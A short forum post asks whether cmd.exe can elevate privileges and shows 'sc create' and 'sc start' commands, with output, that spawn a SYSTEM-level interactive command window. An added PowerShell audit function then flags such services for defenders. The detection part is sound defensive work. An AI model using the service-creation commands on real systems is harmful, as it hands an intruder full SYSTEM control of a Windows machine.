I could be completely wrong about this, but is it possible that cmd.exe itself could be used to elevate privileges?
Code:
 
 >sc create testsvc binpath= "cmd /K start" type= own type= interact

[SC] CreateService SUCCESS

 >sc start testsvc

[SC] StartService FAILED 1053:

 The service did not respond to the start or control request in a timely fashion. 
 

Note that the SC START immediately creates a new CMD window with system privileges, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

A good firewall should detect this though.
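
A defensive check for the service configuration shown in this post, added here as an example and not part of the original post: it flags services whose image is a command interpreter or that are marked interactive. The function name `Test-SuspiciousService`, the interpreter list and the sample objects are assumptions made for the example; the property names are those of the `Win32_Service` CIM class.

```powershell
# Added example (not from the original post): audit service definitions for
# the pattern shown above: an interpreter as the service image and/or the
# interactive flag.
function Test-SuspiciousService {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [object]$Service
    )
    begin {
        # Assumed list of interpreters that are not written to run as services.
        $interpreters = 'cmd', 'powershell', 'pwsh', 'wscript', 'cscript', 'mshta', 'rundll32'
        $systemNames  = 'LocalSystem', 'NT AUTHORITY\SYSTEM'
    }
    process {
        $reasons = @()
        # Take the first token of the command line, quoted or unquoted.
        $image = ''
        if ($Service.PathName -match '^\s*(?:"([^"]+)"|(\S+))') {
            $image = if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
        }
        $leaf = [System.IO.Path]::GetFileNameWithoutExtension($image)
        if ($interpreters -contains $leaf) { $reasons += "image is an interpreter ($leaf)" }
        if ($Service.DesktopInteract)      { $reasons += 'interactive service (type= interact)' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Name     = $Service.Name
                Account  = $Service.StartName
                AsSystem = $systemNames -contains $Service.StartName
                PathName = $Service.PathName
                Reasons  = $reasons -join '; '
            }
        }
    }
}

# Constructed sample: the first object mirrors the service from the post,
# the second is a hypothetical ordinary service that should not be flagged.
$sample = @(
    [pscustomobject]@{ Name = 'testsvc'; PathName = 'cmd /K start'
                       StartName = 'LocalSystem'; DesktopInteract = $true }
    [pscustomobject]@{ Name = 'ExampleSvc'; PathName = '"C:\Program Files\Example\svc.exe" -run'
                       StartName = 'LocalSystem'; DesktopInteract = $false }
)
$sample | Test-SuspiciousService

# On a live host the same function accepts the real service list:
# Get-CimInstance Win32_Service | Test-SuspiciousService
```

New service installations are also recorded as Event ID 7045 in the System log, which gives a point-in-time alert to complement this periodic audit.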